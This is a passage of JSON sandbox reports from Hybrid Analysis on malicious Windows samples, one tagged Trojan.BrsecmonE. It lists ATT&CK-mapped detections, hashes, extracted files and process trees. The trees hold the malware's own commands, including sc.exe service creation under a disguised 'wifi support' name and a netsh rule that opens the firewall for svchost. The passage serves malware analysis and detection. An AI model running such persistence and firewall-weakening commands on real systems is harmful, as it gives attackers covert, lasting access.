\"C:\\8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"mojpivf.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00002772)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-83", "type": 6, "relevance": 7, "name": "Writes PE header to memory", "description": "\"mojpivf.exe wrote PE header bytes (\"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000fdb74393b9d62dc0b9d62dc0b9d62dc0b9d62cc028d62dc0b0aebec0b6d62dc0d6a083c0b8d62dc0d6a0b3c0b8d62dc0d6a086c0a2d62dc0d6a0b0c0b8d62dc052696368b9d62dc000000000000000000000000000000000504500004c010400e1db595a0000000000000000e00002010b010a0000e60000004a0000000000006b9a0000001000000000010000000600001000000002000005000100000000000500010000000000005001000004000000000000020040810000100000100000000010000010000000000000100000000000000000000000b0120100a0000000000000000000000000000000000000000000000000000000004001005c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001005c0200000000000000000000000000000000000000000000000000002e74657874000000b0e400000010000000e6000000040000000000000000000000000000200000602e726461746100009a1e0000000001000020000000ea0000000000000000000000000000400000402e64617461000000581900000020010000020000000a0100000000000000000000000000400000c02e72656c6f630000f20f00000040010000100000000c01000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\") to a remote process \"C:\\Windows\\System32\\svchost.exe\"\n which might be an injection preparation attempt ...", "origin": "API Call", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"svchost.exe\" connects to <IPv4>:25", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-10", "type": 7, "relevance": 6, "name": "Sends network traffic on a typical mail related ports", "description": "Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)", "origin": "Network Traffic", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-88", "type": 7, "relevance": 10, "name": "Application communicates with a malicious domain", "description": "Contacted Domain: \"lazystax.ru\" has been identified as malicious", "origin": "Network Traffic", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-303", "type": 9, "relevance": 10, "name": "Starts service using SC.exe", "description": "Process \"sc.exe\" with commandline \"start tpxhoiko\" (UID: 00000000-00004364)", "origin": "Monitored Target", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-15", "type": 9, "relevance": 8, "name": "Modifies firewall settings", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00003048)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4
https://hybrid-analysis.com/sample/120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4
Hybrid Analysis - Um_unhooking
{"size": 10837849, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4", "sha256": "120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4", "av_detect": 85, "vx_family": "Trojan.BrsecmonE", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 8, "total_processes": 9, "total_signatures": 246, "extracted_files": [{"name": "hfopyujf.exe", "file_path": "%TEMP%\\hfopyujf.exe", "file_size": 5242368, "sha256": "2cb25ddff98a8bbf973f78dcea93da4cd13f6b3bf9ebea1b630b3de395962e15", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe (PID: 5864)", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "hfopyujf.exe.67EE4A7A.bin", "file_size": 14220800, "sha256": "18c3b5d4990bcd159af78c5c6c1645ae7653ce35898c25258da2c725b774d5aa", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "HFOPYUJF.EXE.67EE4A7B.bin", "file_size": 14220800, "sha256": "18c3b5d4990bcd159af78c5c6c1645ae7653ce35898c25258da2c725b774d5aa", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "dism.log", "file_size": 279802, "sha256": "37dec9b13b7f02ef3d3c4fa5637ea22e5328813f6f89a73990dcac12dfb32089", "type_tags": ["text"], "description": "Unicode text, UTF-8 (with BOM) text, with very long lines (312), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "DISMHOST.EXE.67EE5D5B.bin", "file_size": 82944, "sha256": "ecb636b278261eade712e68ec7d805d20e802628248da872d3d0ada1432ffc11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24215)", "1 Unknown Objects (build: 24215)", "1 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24215)"], "imported_objects": ["5 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "17 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "30 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "18 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24123)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 91}, "processes": [{"uid": "00000000-00005864", "name": "120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe", "normalized_path": "C:\\120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe", "sha256": "120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4"}, {"uid": "00000000-00006104", "parentuid": "00000000-00005864", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C mkdir %WINDIR%\\system32\\dzhrysuy\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00005952", "parentuid": "00000000-00005864", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C move /Y \"%TEMP%\\hfopyujf.exe\" %WINDIR%\\system32\\dzhrysuy\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00005960", "parentuid": "00000000-00005864", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "create dzhrysuy binPath= \"%WINDIR%\\system32\\dzhrysuy\\hfopyujf.exe /d\\\"C:\\120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\\\"\" type= own start= auto DisplayName= \"wifi support\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00006008", "parentuid": "00000000-00005864", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "description dzhrysuy \"wifi internet conection\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00005972", "parentuid": "00000000-00005864", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "start dzhrysuy", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00002780", "parentuid": "00000000-00005864", "name": "netsh.exe", "normalized_path": "%WINDIR%\\System32\\netsh.exe", "command_line": "advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\system32\\svchost.exe\" enable=yes>nul", "sha256": "661f5d4ce4f0a6cb32669a43ce5deec6d5a9e19b2387f22c5012405e92169943"}, {"uid": "00000000-00002240", "name": "hfopyujf.exe", "normalized_path": "%WINDIR%\\system32\\dzhrysuy\\hfopyujf.exe", "command_line": "/d\"C:\\120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\"", "sha256": "18c3b5d4990bcd159af78c5c6c1645ae7653ce35898c25258da2c725b774d5aa"}, {"uid": "00000000-00002700", "parentuid": "00000000-00002240", "name": "svchost.exe", "normalized_path": "%WINDIR%\\system32\\svchost.exe", "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "malicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 7, "informative_identifiers_count": 14}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Exploitation for Privilege Escalation", "attck_id": "T1068", "attck_id_wiki": "https://attack.mitre.org/techniques/T1068", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "NTFS File Attributes", "attck_id": "T1564.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 5, "informative_identifiers_count": 20}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": 